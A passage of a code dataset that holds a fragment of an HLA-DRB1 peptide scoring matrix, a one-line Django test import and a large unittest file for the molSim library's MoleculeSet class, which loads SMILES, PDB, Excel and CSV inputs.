] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | DRB1_1601_9 = {0: {'A': -999.0, 'E': -999.0, 'D': -999.0, 'G': -999.0, 'F': -0.004754, 'I': -0.99525, 'H': -999.0, 'K': -999.0, 'M': -0.99525, 'L': -0.99525, 'N': -999.0, 'Q': -999.0, 'P': -999.0, 'S': -999.0, 'R': -999.0, 'T': -999.0, 'W': -0.004754, 'V': -0.99525, 'Y': -0.004754}, 1: {'A': 0.0, 'E': 0.1, 'D': -1.3, 'G': 0.5, 'F': 0.8, 'I': 1.1, 'H': 0.8, 'K': 1.1, 'M': 1.1, 'L': 1.0, 'N': 0.8, 'Q': 1.2, 'P': -0.5, 'S': -0.3, 'R': 2.2, 'T': 0.0, 'W': -0.1, 'V': 2.1, 'Y': 0.9}, 2: {'A': 0.0, 'E': -1.2, 'D': -1.3, 'G': 0.2, 'F': 0.8, 'I': 1.5, 'H': 0.2, 'K': 0.0, 'M': 1.4, 'L': 1.0, 'N': 0.5, 'Q': 0.0, 'P': 0.3, 'S': 0.2, 'R': 0.7, 'T': 0.0, 'W': 0.0, 'V': 0.5, 'Y': 0.8}, 3: {'A': 0.0, 'E': -1.08, 'D': -1.0069, 'G': -0.81907, 'F': 1.3924, 'I': 0.61947, 'H': 0.40626, 'K': -0.45215, 'M': 1.0143, 'L': 0.67657, 'N': -0.13424, 'Q': -0.53328, 'P': -0.95473, 'S': -0.50619, 'R': -0.11223, 'T': -0.48406, 'W': 0.24124, 'V': 0.17518, 'Y': 1.0306}, 4: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 5: {'A': 0.0, 'E': -1.1673, 'D': -0.78085, 'G': 0.15728, 'F': -0.53944, 'I': 0.14642, 'H': -0.49905, 'K': -0.18774, 'M': -0.15186, 'L': 0.10596, 'N': 0.52871, 'Q': -0.76809, 'P': -0.070009, 'S': 0.51336, 'R': 0.75411, 'T': 0.23889, 'W': -0.60847, 'V': 0.034365, 'Y': -0.034547}, 6: {'A': 0.0, 'E': -1.8769, 'D': -2.3351, 'G': -0.56145, 'F': -0.57811, 'I': -0.19487, 'H': -0.55879, 'K': -0.57848, 'M': 0.28653, 'L': 0.34381, 'N': -0.96538, 'Q': -0.97979, 'P': -0.80863, 'S': -1.1338, 'R': -0.42801, 'T': -1.7693, 'W': -0.78282, 'V': -0.79875, 'Y': -0.72388}, 7: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 8: {'A': 0.0, 'E': -1.8514, 'D': -1.86, 'G': -0.76974, 'F': -0.37372, 'I': 0.68078, 'H': -1.0629, 'K': -1.6348, 'M': 0.10043, 'L': 0.46076, 'N': -1.1859, 'Q': -1.5258, 'P': -1.0812, 'S': -0.24476, 'R': -0.95816, 'T': -0.22457, 'W': -1.3819, 'V': 0.28332, 'Y': -0.8679}} | 2,167 | 2,167 | 0.395016 | 525 | 2,167 | 1.626667 | 0.201905 | 0.114754 | 0.028103 | 0.037471 | 0.224824 | 0.142857 | 0.142857 | 0.142857 | 0.133489 | 0.133489 | 0 | 0.374656 | 0.162437 | 2,167 | 1 | 2,167 | 2,167 | 0.095868 | 0 | 0 | 0 | 0 | 0 | 0.078875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
76e04e9c1832ba07698bd9f24a27447e818ad7fd | 29 | py | Python | newenv/lib/python3.6/site-packages/django_nine/tests/__init__.py | SashaPo/Clovin | d6b63bad015fec4906198c0ff57d39a16207cc76 | [
"MIT"
] | null | null | null | newenv/lib/python3.6/site-packages/django_nine/tests/__init__.py | SashaPo/Clovin | d6b63bad015fec4906198c0ff57d39a16207cc76 | [
"MIT"
] | 7 | 2020-06-06T01:06:19.000Z | 2022-02-10T11:15:14.000Z | newenv/lib/python3.6/site-packages/django_nine/tests/__init__.py | SashaPo/Clovin | d6b63bad015fec4906198c0ff57d39a16207cc76 | [
"MIT"
] | 1 | 2020-11-04T03:21:24.000Z | 2020-11-04T03:21:24.000Z | from .test_versions import *
| 14.5 | 28 | 0.793103 | 4 | 29 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
76ef6317e1d34f1182441f995d0f9e1f486d95b0 | 43,825 | py | Python | tests/test_MoleculeSet.py | himaghna/molSim | 8c1356ec9cc3e08d4d30696adc682dc912675023 | [
"MIT"
] | 1 | 2020-02-10T20:14:21.000Z | 2020-02-10T20:14:21.000Z | tests/test_MoleculeSet.py | himaghna/molSim | 8c1356ec9cc3e08d4d30696adc682dc912675023 | [
"MIT"
] | 67 | 2020-02-10T08:09:03.000Z | 2022-01-18T15:27:27.000Z | tests/test_MoleculeSet.py | himaghna/molSim | 8c1356ec9cc3e08d4d30696adc682dc912675023 | [
"MIT"
] | 3 | 2020-02-10T20:14:25.000Z | 2020-06-26T15:35:57.000Z | """Test the MoleculeSet class."""
from os import remove, mkdir
import os.path
from shutil import rmtree
import unittest
import numpy as np
import pandas as pd
from rdkit.Chem import MolFromSmiles
from rdkit.Chem.rdmolfiles import MolToPDBFile
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from molSim.chemical_datastructures import Molecule, MoleculeSet
from molSim.ops import Descriptor, SimilarityMeasure
from molSim.exceptions import NotInitializedError, InvalidConfigurationError
SUPPORTED_SIMILARITIES = SimilarityMeasure.get_supported_metrics()
SUPPORTED_FPRINTS = Descriptor.get_supported_fprints()
class TestMoleculeSet(unittest.TestCase):
test_smarts = [
"[CH3:1][S:2][c:3]1[cH:4][cH:5][c:6]([B:7]([OH:8])[OH:9])[cH:10][cH:11]1",
"[NH:1]1[CH2:2][CH2:3][O:4][CH2:5][CH2:6]1.[O:7]=[S:8]=[O:9]",
]
test_smiles = [
"CCCCCCC",
"CCCC",
"CCC",
"CO",
"CN",
"C1=CC=CC=C1",
"CC1=CC=CC=C1",
"C(=O)(N)N",
]
def smiles_seq_to_textfile(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a text file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses.. Defaults to None.
Returns:
str: Path to created file.
"""
text_fpath = "temp_smiles_seq.txt"
print(f"Creating text file {text_fpath}")
with open(text_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return text_fpath
def smiles_seq_to_smi_file(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a .smi file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
smi_fpath = "temp_smiles_seq.smi"
print(f"Creating text file {smi_fpath}")
with open(smi_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return smi_fpath
def smiles_seq_to_smiles_file(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a .SMILES file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
SMILES_fpath = "temp_smiles_seq.SMILES"
print(f"Creating text file {SMILES_fpath}")
with open(SMILES_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smiles):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return SMILES_fpath
def smarts_seq_to_smiles_file(self, property_seq=None):
"""Helper method to convert a SMARTS sequence to a .SMILES file.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created file.
"""
SMILES_fpath = "temp_smiles_seq.SMILES"
print(f"Creating text file {SMILES_fpath}")
with open(SMILES_fpath, "w") as fp:
for id, smiles in enumerate(self.test_smarts):
write_txt = smiles
if property_seq is not None:
write_txt += " " + str(property_seq[id])
if id < len(self.test_smiles) - 1:
write_txt += "\n"
fp.write(write_txt)
return SMILES_fpath
def smiles_seq_to_pdb_dir(self, property_seq=None):
"""Helper method to convert a SMILES sequence to a pdb files
stored in a directory.
Args:
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
Returns:
str: Path to created directory.
"""
dir_path = "test_dir"
if not os.path.isdir(dir_path):
print(f"Creating directory {dir_path}")
mkdir(dir_path)
for smiles_str in self.test_smiles:
mol_graph = MolFromSmiles(smiles_str)
assert mol_graph is not None
pdb_fpath = os.path.join(dir_path, smiles_str + ".pdb")
print(f"Creating file {pdb_fpath}")
MolToPDBFile(mol_graph, pdb_fpath)
return dir_path
def smiles_seq_to_xl_or_csv(
self, ftype, property_seq=None, name_seq=None, feature_arr=None
):
"""Helper method to convert a SMILES sequence or arbitrary features
to Excel or CSV files.
Args:
ftype (str): String label to denote the filetype. 'csv' or 'excel'.
property_seq (list or np.ndarray, optional): Optional sequence of
molecular responses. Defaults to None.
name_seq (list or np.ndarray, optional): Optional sequence of
molecular names. Defaults to None.
feature_arr (np.ndarray, optional): Optional array of molecular
descriptor values. Defaults to None.
Raises:
ValueError: Invalid file type specified.
Returns:
str: Path to created file.
"""
data = {"feature_smiles": self.test_smiles}
if property_seq is not None:
data.update({"response_random": property_seq})
if name_seq is not None:
data.update({"feature_name": name_seq})
if feature_arr is not None:
feature_arr = np.array(feature_arr)
for feature_num in range(feature_arr.shape[1]):
data.update({f"feature_{feature_num}":
feature_arr[:, feature_num]})
data_df = pd.DataFrame(data)
fpath = "temp_mol_file"
if ftype == "excel":
fpath += ".xlsx"
print(f"Creating {ftype} file {fpath}")
data_df.to_excel(fpath)
elif ftype == "csv":
fpath += ".csv"
print(f"Creating {ftype} file {fpath}")
data_df.to_csv(fpath)
else:
raise ValueError(f"{ftype} not supported")
return fpath
def test_set_molecule_database_from_textfile(self):
"""
Test to create MoleculeSet object by reading molecule database
from a textfile.
"""
text_fpath = self.smiles_seq_to_textfile()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smi_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a smi file.
"""
text_fpath = self.smiles_seq_to_smi_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smiles_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a SMILES file.
"""
text_fpath = self.smiles_seq_to_smiles_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_smarts_file(self):
"""
Test to create MoleculeSet object by reading molecule database
from a SMILES file containing SMARTS strings.
"""
text_fpath = self.smarts_seq_to_smiles_file()
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smarts),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smarts[id],
"Expected mol_text attribute of Molecule object to be smiles",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object "
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_subsample_molecule_database_from_textfile(self):
"""
Test to randomly subsample a molecule database loaded from a textfile.
"""
text_fpath = self.smiles_seq_to_textfile()
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be equal "
"to number of smiles in text file * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_w_property_from_textfile(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from a textfile.
"""
properties = np.random.normal(size=len(self.test_smiles))
text_fpath = self.smiles_seq_to_textfile(property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=text_fpath,
molecule_database_src_type="text",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from text",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in text file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object " "to be smiles",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of"
"Molecule object "
"to be set to value in text file",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {text_fpath}...")
remove(text_fpath)
def test_set_molecule_database_from_pdb_dir(self):
"""
Test to create MoleculeSet object by reading molecule database
from a directory of pdb files.
"""
dir_path = self.smiles_seq_to_pdb_dir(self.test_smiles)
molecule_set = MoleculeSet(
molecule_database_src=dir_path,
molecule_database_src_type="directory",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose, "Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from dir",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number " "of files in dir",
)
for molecule in molecule_set.molecule_database:
self.assertIn(
molecule.mol_text,
self.test_smiles,
"Expected molecule text to be a smiles string",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object"
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting directory {dir_path}...")
rmtree(dir_path)
def test_subsample_molecule_database_from_pdb_dir(self):
"""
Test to randomly subsample a molecule database loaded from a
directory of pdb files.
"""
dir_path = self.smiles_seq_to_pdb_dir(self.test_smiles)
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=dir_path,
molecule_database_src_type="directory",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from dir",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be "
"equal to number of files in dir * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting directory {dir_path}...")
rmtree(dir_path)
def test_set_molecule_database_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
from an Excel file.
"""
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel")
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number of smiles",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object"
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_subsample_molecule_database_from_excel(self):
"""
Test to randomly subsample a molecule database loaded from an
Excel file.
"""
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel")
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
sampling_ratio=sampling_ratio,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of subsampled database to be "
"equal to number of smiles * sampling ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_w_property_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from an Excel file.
"""
properties = np.random.normal(size=len(self.test_smiles))
xl_fpath = self.smiles_seq_to_xl_or_csv(ftype="excel",
property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in excel file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of"
"Molecule object "
"to be set to value in excel file",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_w_descriptor_property_from_excel(self):
"""
Test to create MoleculeSet object by reading molecule database
containing arbitrary molecular descriptor values from an Excel file.
"""
properties = np.random.normal(size=len(self.test_smiles))
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
xl_fpath = self.smiles_seq_to_xl_or_csv(
ftype="excel", property_seq=properties, feature_arr=features
)
molecule_set = MoleculeSet(
molecule_database_src=xl_fpath,
molecule_database_src_type="excel",
similarity_measure="l0_similarity",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in excel file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in excel",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of"
"Molecule object "
"to be set to value in excel file",
)
self.assertTrue(
(molecule.descriptor.to_numpy() == features[id]).all,
"Expected descriptor value to be same as the "
"vector used to initialize descriptor",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to " "be Molecule object",
)
print(f"Test complete. Deleting file {xl_fpath}...")
remove(xl_fpath)
def test_set_molecule_database_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from a CSV file.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "csv file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number " "of smiles",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertIsNone(
molecule.mol_property_val,
"Expected mol_property_val of Molecule object"
"initialized without property to be None",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_subsample_molecule_database_from_csv(self):
"""
Test to randomly subsample a molecule database loaded from an
CSV file.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
sampling_ratio = 0.5
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
sampling_ratio=sampling_ratio,
is_verbose=True,
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
self.assertEqual(
len(molecule_set.molecule_database),
int(sampling_ratio * len(self.test_smiles)),
"Expected the size of database to be equal to number "
"of smiles * sampling_ratio",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_property_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
and molecular responses from a CSV file.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type="morgan_fingerprint",
similarity_measure="tanimoto",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of"
"Molecule object "
"to be set to value in csv file",
)
self.assertIsInstance(molecule, Molecule)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_descriptor_property_from_csv(self):
"""
Test to create MoleculeSet object by reading molecule database
containing arbitrary molecular descriptors and molecular responses
from a CSV file.
"""
properties = np.random.normal(size=len(self.test_smiles))
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
csv_fpath = self.smiles_seq_to_xl_or_csv(
ftype="csv", property_seq=properties, feature_arr=features
)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure="l0_similarity",
is_verbose=True,
)
self.assertTrue(molecule_set.is_verbose,
"Expected is_verbose to be True")
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from " "excel file",
)
self.assertEqual(
len(molecule_set.molecule_database),
len(self.test_smiles),
"Expected the size of database to be equal to number "
"of smiles in csv file",
)
for id, molecule in enumerate(molecule_set.molecule_database):
self.assertEqual(
molecule.mol_text,
self.test_smiles[id],
"Expected mol_text attribute of Molecule object "
"to be smiles when names not present in csv",
)
self.assertAlmostEqual(
molecule.mol_property_val,
properties[id],
places=7,
msg="Expected mol_property_val of"
"Molecule object "
"to be set to value in csv file",
)
self.assertTrue(
(molecule.descriptor.to_numpy() == features[id]).all,
"Expected descriptor value to be same as the "
"vector used to initialize descriptor",
)
self.assertIsInstance(
molecule,
Molecule,
"Expected member of molecule_set to be Molecule object",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_similarity_from_csv(self):
"""
Verify that a NotInitializedError is raised if no fingerprint_type
is specified when instantiating a MoleculeSet object.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
for similarity_measure in SUPPORTED_SIMILARITIES:
with self.assertRaises(NotInitializedError):
MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure=similarity_measure,
is_verbose=False,
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_fingerprint_from_csv(self):
"""
Verify that a TypeError is raised if no similarity_measure
is specified when instantiating a MoleculeSet object.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
for descriptor in SUPPORTED_FPRINTS:
with self.assertRaises(TypeError):
MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
is_verbose=False,
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_set_molecule_database_w_fingerprint_similarity_from_csv(self):
"""
Test all combinations of fingerprints and similarity measures with the
MoleculeSet class.
"""
properties = np.random.normal(size=len(self.test_smiles))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv",
property_seq=properties)
